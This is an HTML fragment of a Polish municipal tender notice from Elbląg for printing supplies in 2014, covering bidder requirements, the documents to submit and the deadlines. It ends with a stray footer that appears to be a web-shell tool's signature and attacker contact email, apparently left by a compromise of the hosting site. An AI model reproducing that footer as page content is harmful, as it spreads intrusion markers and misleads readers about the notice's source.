<ul class="kh_indent_1"><li><p>Warunkiem udziału w postępowaniu jest wykonanie w sposób należyty w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 dostawy druków o ilości co najmniej 120 000 sztuk.

Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ oraz dokumentów wymienionych w pkt VI. ppkt 1.2. SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Obowiązek wskazania przez Wykonawcę w wykazie dotyczy dostaw druków o ilości co najmniej 120 000 szt.;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
Uwaga:
Treść wymaganego Oświadczenia w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ.
Oświadczenie należy składać w oryginale.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu, Referat Zamówień Publicznych, pokój 405, 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2014 godzina 09:30, miejsce: Urząd Miejski w Elblągu, Referat Zamówień Publicznych pokój 403, 82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.   Dotyczy Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA	
data rozpoczęcia: data udzielenia zamówienia
data zakończenia: 31 grudnia 2014 r.
w tym:
I etap   - w terminie 3 tygodni od daty udzielenia zamówienia 
II etap  - w terminie do 31 lipca 2014 r.
III etap - w terminie do 30 września 2014 r.
IV etap  - w terminie do 31 grudnia 2014 r.
-	poz 1. - wizytówki z pkt III. ppkt 2. lit. C SIWZ sukcesywnie w miarę potrzeb Zamawiającego.
2. Uwaga do oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ:
a)	Treść wymaganego Oświadczenia w zakresie art. 22 ust. 1 ustawy Prawo zamówień publicznych Zamawiający przekazuje na ZAŁĄCZNIKU NR 2a do SIWZ. Oświadczenie należy składać w oryginale.
b)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wymagane oświadczenie może być złożone przez pełnomocnika w imieniu wszystkich Wykonawców lub przez wszystkich Wykonawców na jednym dokumencie lub przez każdego Wykonawcę odrębnie (jeżeli każdy z Wykonawców spełnia warunki udziału samodzielnie).
3. Uwaga do dokumentu wymienionego w pkt VI. ppkt 1.2. SIWZ:
a)	Dowodami, o których mowa powyżej jest:
- poświadczenie,
- oświadczenie Wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej.
b)	W przypadku, gdy podmiotem na rzecz którego dostawy wskazane w wykazie zostały wcześniej wykonane jest Gmina - Miasto Elbląg, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.
c)	Przedmiot wykazanych dostaw należy podać z taką szczegółowością, która umożliwi Zamawiającemu sprawdzenie spełniania warunku określonego w Sekcji III.3.2) ogłoszenia.
d)	Obowiązek wskazania przez Wykonawcę w wykazie dotyczy dostaw druków o ilości co najmniej 120 000 szt.
e)	Dowody, że dostawy zostały wykonane należycie, należy złożyć tylko do wskazanych w wykazie dostaw, o których mowa w Sekcji III.3.2) ogłoszenia.
f)	Wartości potwierdzające spełnianie warunku udziału podane w walutach innych niż wskazane przez Zamawiającego dla wartości dostaw należy przeliczyć wg średniego kursu NBP na dzień odbioru tych dostaw, podając datę i kurs.
g)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w Sekcji III.3.2) ogłoszenia.
h)	Wykonawca, który polega na wiedzy i doświadczeniu innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
4.Uwaga do oświadczenia wymienionego w pkt VI.A. ppkt 1. SIWZ:
a) Treść wymaganego Oświadczenia Zamawiający przekazuje na ZAŁĄCZNIKU NR 2b do SIWZ.
b) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
5. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 2. SIWZ:
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
6. Uwaga do dokumentu wymienionego w pkt VI.A. ppkt 3. SIWZ:
a)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
b)	Informację o przynależności do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy Prawo zamówień publicznych należy złożyć zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 4 do SIWZ.
7. Dotyczy Sekcji III.4.3) Dokumenty podmiotów zagranicznych:
Jeżeli w kraju miejscu zamieszkania osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w sekcji III.4.3.1) ogłoszenia, zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji Wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
8. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.
9. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia.
10. Warunki udziału, o których mowa w art. 22 ust. 1 ustawy oraz opis sposobu dokonania oceny ich spełniania mają na celu zweryfikowanie zdolności wykonawcy do należytego wykonania udzielanego zamówienia.
UWAGA:
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com